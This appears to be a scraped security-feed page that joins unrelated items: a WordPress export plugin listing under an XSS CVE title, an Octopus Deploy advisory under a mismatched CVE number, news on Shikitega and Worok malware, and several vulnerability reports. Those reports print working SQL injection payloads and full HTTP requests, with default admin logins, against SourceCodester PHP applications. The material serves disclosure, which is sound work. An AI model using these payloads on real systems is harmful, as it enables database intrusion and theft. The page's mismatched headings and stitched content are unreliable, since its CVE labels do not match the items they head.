Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Apasionados Export Post Info plugin <= 1.1.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file, allowing to have an overview of the topics and titles published in the blog.

We created this plugin because we generate large amounts of content for blogs and we often need to lookup the topics that were already covered before in a blog. As we don’t want to export the titles by hand we developed this plugin.

**What can I do with this plugin?**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file that can be imported into Excel.

**What ideas is this plugin based on?**

We were searching for a plugin that allowed us to export the post titles and found Export All URLs. Unfortunately the plugin didn’t export the publish date, status and word count, so we decided to create a new plugin with this information and the the ability to translate it.

**System requirements**

PHP version 5.5 or greater.

**Export Post Info to CSV Plugin in your Language!**

This first release is avaliable in English and Spanish. In the “languages” folder we have included the necessarry files to translate this plugin.

If you would like the plugin in your language and you’re good at translating, please drop us a line at Contact us.

**Further Reading**

You can access the description of the plugin in Spanish at: Export Post Info to CSV en español.

**Contact**

For further information please send us an email.

**Translating WordPress Plugins**

The steps involved in translating a plugin are:

1.  Run a tool over the code to produce a POT file (Portable Object Template), simply a list of all localizable text. Our plugins allready havae this POT file in the /languages/ folder.
2.  Use a plain text editor or a special localization tool to generate a translation for each piece of text. This produces a PO file (Portable Object). The only difference between a POT and PO file is that the PO file contains translations.
3.  Compile the PO file to produce a MO file (Machine Object), which can then be used in the theme or plugin.

In order to translate a plugin you will need a special software tool like poEdit, which is a cross-platform graphical tool that is available for Windows, Linux, and Mac OS X.

The naming of your PO and MO files is very important and must match the desired locale. The naming convention is: language_COUNTRY.po and plugins have an additional naming convention whereby the plugin name is added to the filename: pluginname-fr_FR.po

That is, the plugin name name must be the language code followed by an underscore, followed by a code for the country (in uppercase). If the encoding of the file is not UTF-8 then the encoding must be specified.

For example:

*   en\_US � US English
*   en\_UK � UK English
*   es\_ES � Spanish from Spain
*   fr\_FR � French from France
*   zh\_CN � Simplified Chinese

A list of language codes can be found here, and country codes can be found here. A full list of encoding names can also be found at IANA.

**Screenshots**

**Installation**

1.  First you will have to upload the plugin to the /wp-content/plugins/ folder.
2.  Then activate the plugin in the plugin panel.
3.  Go to SETTINGS / EXPORT POST INFO.
4.  Save a random string to make it harder for somebody to access your exported data.
5.  Download your CSV file.

**FAQ**

**Why did you make this plugin?**

We couldn’t find a plugin that would give us the functionality we were looking for:  
1) Export publish date.  
2) Export word count.  
3) Easy translation of the plugin into other languages. So far English and Spanish translations are included.

**Why do I have to setup a random string for the name of the export CSV file?**

Other plugins always export the file with the same name and in the same folder so it’s easy to access this file. We don’t want that this file can be easily found, so we decided to let you setup a random string to make the file name harder to guess.

**Does Export Post Info make changes to the database?**

Yes. It created an entry in the options table where the random string is stored.

**How can I check out if the plugin works for me?**

Install and activate. Go to settings / Export Post Info. Save random string. And download CSV file.

**How can I remove Export Post Info to CSV?**

You can simply activate, deactivate or delete it in your plugin management section.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.5 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.5 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Yes. On a multi-language site the export will not work correctly.

**Is this plugin compatible with WPML**

Yes, but only the posts of the main language are exported. Post in secondary languages are not exported at this moment. We are working on this because we would like to have this feature but for us it isn’t easy to code.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.5 or higher and we recommend using PHP version 7.3 or higher.

**Do you make use of Export Post Info to CSV yourself?**

Of course we do. That’s why we created it. 😉

**Reviews**

From uploading the plugin to downloading the CSV file took about 15 seconds! Just perfect - thank you!

This plugin exported exactly what I needed, and it did it quickly and painlessly. Thanks very much to the devs!

Time saver, works just fine

Super plugin, très simple à utiliser. Merci !

Thank you so much for this amazing little plugin that did exactly what I needed. Saved me hours of work in creating a spreadsheet with all my posts so I can create an optimization checklist. The other popular export all posts plugin only exports the post title, url and category. Without the date and other fields, I would have to go in and manually add that data. Export Post Info (this plugin) did all of it perfectly. Keep up the great work!

October 11, 2018

Not sure why this plug in has no reviews. Did for me EXACTLY what I needed even though it is two years old. Muchas Gracias

Read all 6 reviews

**Contributors & Developers**

“Export Post Info” is open source software. The following people have contributed to this plugin.

Contributors

*    apasionados

**Changelog****1.2.0 (06/Sep/2022)**

*   Security update: Please update your plugin. We escaped data to increase your security.
*   Corrected PHP notices when debug was active.

**1.1.0 (25/Aug/2019)**

*   Now posts with status published, future and private are exported. Until now only posts with status published were exported.
*   Added post status column to the export file.
*   PHP version must be 5.6 or higher. Recommended PHP version: 7.3.

**1.0.4 (08/Abr/2017)**

*   Cleaned up code + Changed functions name to be unique and avoid conflicts with other plugins or themes.

**1.0.3 (07/Abr/2017)**

*   Added check for PHP version when activating the plugin. PHP version must be 5.5 o greater.

**1.0.2 (07/Abr/2017)**

*   Solved error in Word Count with words containing UTF-8 characters.

**1.0.1 (07/Abr/2017)**

*   Word count would not count all words of a post if a tag was present.

**1.0.0 (07/Abr/2017)**

*   First official release.

CVE-2022-38068: Export Post Info

In affected versions of Octopus Deploy it is possible to upload a package to built-in feed with insufficient permissions after re-indexing packages.

Summary

Service Account with FeedView permission can upload to built-in feed after re-indexing packages (CVE-2022-2528)

Advisory Number

2022-13

Discovery Date

25 JUL 2022

Patch Release Date

10 AUG 2022

Advisory Release Date

09 SEP 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2528

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.7718 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to upload a package to built-in feed with insufficient permissions after re-indexing packages.

The versions of Octopus Server affected by this vulnerability are:

*   All 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.3106
*   All 2022.2.x versions before 2022.2.7718
*   All 2022.3.x versions before 2022.3.7782

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3106
*   2022.2.7718
*   2022.3.7782

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.7718). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.7718):**

If you have feature version...

...then upgrade to this version

3.x.x, 4.x.x

2022.1.3106 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.3106 or greater

2022.1.x

2022.1.3106 or greater

2022.2.x

2022.2.7718 or greater

2022.3.x

2022.3.7782 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2528, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found during internal testing by Dom Richardson and Paul Calvert at Octopus Deploy

CVE-2022-2528: Security Advisory 2022-13

By Deeba Ahmed
The stealthy malware leverages security flaws to gain privilege escalation and establish persistence.
This is a post from HackRead.com Read the original post: Stealthy Linux Malware Shikitega Deploying Monero Cryptominer

AT&T Alien Labs reports that a new Linux malware dubbed Shikitega infects computers and **IoT devices** (internet of things) with multiple payloads. The stealthy malware leverages security flaws to gain privilege escalation and establish persistence. After the attacker controls the system, a **cryptocurrency miner** is deployed.

**Infection Chain Analysis**

As **pointed out** by AT&T Alien Labs, Shikitega malware entails a multi-step infection chain. It delivers a few hundred bytes per layer to encourage module activation. Each module responds to a different part of the payload, after which the next one is executed.

The malware allows attackers to control the system completely and run cryptominers. Each module has a specific task, such as downloading/executing **meterpreter Metasploit**, setting persistence on the infected device, exploiting Linux flaws, and downloading/executing a **cryptominer**.

The method to gain initial compromise is yet unknown. The first infection layer is a 370 bytes ELF file containing the encoded shellcode. After the decryption is completed, the final Mettle payload with remote code execution and control capabilities is executed through “int 0x80,” which helps execute the appropriate syscall.

Afterward, it downloads and runs other commands received from its C2 server by calling 102 syscall. The commands aren’t stored in the hard drive but executed from memory. Mettle retrieves a smaller ELF file that downloads and executes the cryptominer.

Shikitega operation process

Furthermore, Shikitega uses a polymorphic XOR additive feedback encoder dubbed **Shikata Ga Nai**. It was previously examined by researchers, which reported that each encoded shellcode it creates is different from the rest because it uses several techniques like dynamic block ordering, dynamic instruction substitution, and randomization of instruction spacing between instructions.

In this campaign, this encoder is employed to make detection by antivirus engines complex and exploit cloud services.

> “Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload.”
> 
> Ofer Caspi – AT&T

Shikitega is an evasive malware because it can download next-stage payloads from a C2 server and directly executes them in memory. It achieves privilege escalation through exploiting PwnKit or **CVE-2021-4034** and **CVE-2021-3493**. The attacker can easily abuse the elevated permissions to fetch the final stage shellcode scripts with root privileges and deploy **Monero cryptominer**.

1.  **New Linux malware is evading detection to mine cryptocurrency**
2.  **Old crypto malware makes come back, hits Windows, Linux devices**
3.  **New Linux Malware Installs Bitcoin Mining Software on Infected Device**
4.  **Golang malware infecting Windows, and Linux servers with XMRig miner**
5.  **ElectroRat crypto-stealing malware hits macOS, Windows, Linux devices**

Stealthy Linux Malware Shikitega Deploying Monero Cryptominer

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/modstudent/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=edit&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=edit&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38269: bug_report/SQLi-2.md at main · moyess/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/autonumber/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/autonumber/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/autonumber/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/autonumber/index.php?view=edit&id=-1%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /activity/admin/modules/autonumber/index.php?view\=edit&id\=\-1%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38268: bug_report/SQLi-3.md at main · moyess/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/user/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/user/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/user/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/user/index.php?view=edit&id=-4%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /activity/admin/modules/user/index.php?view\=edit&id\=\-4%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38267: bug_report/SQLi-1.md at main · moyess/bug_report

Apartment Visitor Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /avms/edit-apartment.php.

Permalink

**Apartment Visitor Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: xxxcoll

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code

The program is built using the xmapp-php8.1 version

Vulnerability File: /avms/edit-apartment.php?editid=

Vulnerability location: /avms/edit-apartment.php?editid=, editid

dbname =avms\_db

\[+\] Payload: /avms/edit-apartment.php?editid=-20%27%20union%20select%201,database(),3,4--+ // Leak place ---> editid

GET /avms/edit\-apartment.php?editid\=\-20%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38265: bug_report/SQLi-1.md at main · xxxcoll/bug_report

By Deeba Ahmed
Worok is primarily targeting organizations in banking, telecommunication, marine, military, energy, public sectors, and government in its current campaign.
This is a post from HackRead.com Read the original post: Worok Hackers Targeting Orgs, Govts in Asia, Middle East and Africa

ESET telemetry has discovered a new malware campaign targeting local governments and high-profile organizations in Asia, the Middle East, and Africa.

In the recently discovered targeted attacks, undocumented tools are being used by a lesser-known cyberespionage group identified as Worok discovered by ESET researcher Thibaut Passilly.

This group has been active since 2020, when it targeted governments and organizations in multiple countries, including a telecom firm in East Asia, a bank in Central Asia, and a Southeast Asian maritime sector firm.

Worok is primarily targeting organizations in banking, telecommunication, marine, military, energy, public sectors, and government in its current campaign. The group claims to be a cyberespionage collective that develops its own tools and uses existing tools to compromise the target. Its custom toolset in 2021 included:

*   CLRoad (a first-stage loader).
*   PNGLoad (a second-stage loader).
*   A full-featured PowHeartBeat backdoor written in PowerShell.

The backdoor can command and process execution and perform file manipulation. 

**Campaign Details**

According to ESET’s research, attackers sometimes exploited the infamous ProxyShell vulnerability (**CVE-2021-34523**) discovered in 2021 to gain initial access. Malware operators are looking to obtain sensitive information from their targets as their focus has been on “high-profile entities in Asia and Africa,” and they have targeted both public and private sector firms. Besides, they are also focusing on government entities.

After gaining initial access, the operators deploy numerous publicly available tools for further infiltration, including **EarthWorm**, **Mimikatz**, **NBTscan**, and **ReGeorg**. Then they deploy their custom implants, including a first-stage loader followed by a second-stage .NET loader. The researchers could not identify the final payloads, ESET’s Thibaut Passilly wrote in a **blog post**.

After observing the Worok group’s activity in 2020, ESET noticed a break between May 2021 and January 2022, and then it resurfaced in February 2020, during which it targeted an energy firm in Central Asia and a public sector organization in Southeast Asia,

> “While our visibility at this stage is limited, we hope that putting the spotlight on this group will encourage other researchers to share information about this group.”
> 
> ESET

1.  **Nation-State Hackers Targeted Facebook – Meta**
2.  **Iranian hackers deface US government & African bank website**
3.  **Windows, Linux and macOS Hit by Chinese Iron Tiger APT Group**
4.  **US Warns Firms About North Korean Hackers Posing as IT Workers**
5.  **Indian APT exposes its Modus Operandi by infecting their own devices**

Worok Hackers Targeting Orgs, Govts in Asia, Middle East and Africa

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=questiondelete&id=.

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: Fright-Moch

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/delete.php?action=questiondelete&id=

Vulnerability location: /interview/delete.php?action=questiondelete&id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/delete.php?action=questiondelete&id=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) // Leak place ---> id

GET /interview/delete.php?action\=questiondelete&id\=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38260: bug_report/SQLi-2.md at main · Fright1Moch/bug_report

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /interview/editQuestion.php.

Permalink

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: Fright-Moch

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/editQuestion.php?id=

Vulnerability location: /interview/editQuestion.php?id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/editQuestion.php?id=-6%20union%20select%201,database()--+ // Leak place ---> id

GET /interview/editQuestion.php?id\=\-6%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

Tag

#windows